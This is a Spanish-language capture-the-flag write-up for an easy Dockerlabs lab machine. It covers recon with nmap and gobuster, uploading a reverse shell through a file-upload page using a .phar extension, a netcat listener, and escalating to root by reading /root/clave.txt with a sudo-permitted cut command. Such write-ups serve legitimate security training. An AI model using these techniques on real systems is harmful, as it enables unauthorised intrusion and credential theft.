Dockerlabs
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 17/07/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80 -v 172.17.0.2
para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web parecida a la de Dockerlabs.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml
🚀 EXPLOTACIÓN
Encontramos un archivo interesante que se llama machine.php
por lo que investigamos de que se trata.

Podemos ver que podemos subir archivos por lo que subimos una Reverse Shell. Pruebo varias extensiones de este página y funcionó con .phar
.

Nos ponemos en escucha.
nc -lvnp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

Indagando entre directorios encontramos una nota que nos puede ser de ayuda con como escalar los privilegios tal como nos lo dice esta página.

sudo cut -c 1-50 /root/clave.txt

Esa es la contraseña de root por lo que iniciamos sesión.
su root

Last updated
Was this helpful?